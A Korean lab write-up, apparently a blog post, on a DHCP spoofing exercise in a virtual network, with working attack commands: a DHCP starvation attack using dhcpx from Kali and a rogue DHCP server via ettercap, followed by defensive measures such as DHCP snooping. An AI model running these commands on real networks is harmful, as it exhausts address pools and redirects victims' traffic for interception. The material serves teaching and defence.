DHCP Spoofing

토폴로지

2008-s1 pw : 암호1234.

 

 

window server2008에서 dhcp 설치

DHCP 서버 설치

 

 

범위 추가

 

 

제외 주소 추가

 

 

GW 주소 추가

 

 

XP에서 주소 받기

 

 

nmap

10.1.10.0/24 에서 service 확인

 

 

dhcp 서버 10.1.10.250 확인

 

 

discover 패킷 내용 확인

 

 

dhcp 서버의 운영체제와 버전 확인

 

 

kali 설치 패키지

apt install irpas

 

 

dhcp starvation attack

dhcpx -i eth0 -vv -A

 

 

dhcp 사용량 확인

 

 

모두 소진됨 확인

 

 

DHCP Spoofing

ettercap -i eth0 -T -M dhcp:10.1.10.200-210/255.255.255.0/8.8.8.8

 

 

ipconfig /release 후 다시 ip를 받으면 200번대로 받아짐

 

 

DHCP Spoofing 방지

• DHCP 스누핑 구성 : 네트워크 장비에서 DHCP 스누핑을 구성하여 허가되지 않은 DHCP 서버로부터의 메시지를 차단한다.
• 정적 IP 할당 : 네트워크에서는 클라이언트 장치에 대한 IP 주소를 정적으로 할당하여 DHCP 서버를 통해 IP 주소를 동적으로 할당하는 것을 방지할 수 있다.
• 네트워크 모니터링 : 네트워크에서 이상한 DHCP 요청이나 응답을 감지하고 이에 대응하기 위해 주기적으로 네트워크를 모니터링한다.
• 세그먼테이션: 네트워크를 세분화하여 공격자가 다른 세그먼트에 접근하지 못하도록 한다.
• 보안 솔루션: IDS(침입 탐지 시스템)나 IPS(침입 방지 시스템)과 같은 보안 솔루션을 사용하여 DHCP 스푸핑 공격을 식별하고 차단할 수 있다.

 

 

DHCP Spoofing 구성 참고 사이트

[가상공격 실습] KALI Linux를 통한 DHCP Spoofing 공격 실습과 방어 대책 : 네이버 블로그 (naver.com)

[가상공격 실습] KALI Linux를 통한 DHCP Spoofing 공격 실습과 방어 대책

 

 

• 확인

show ip dhcp snooping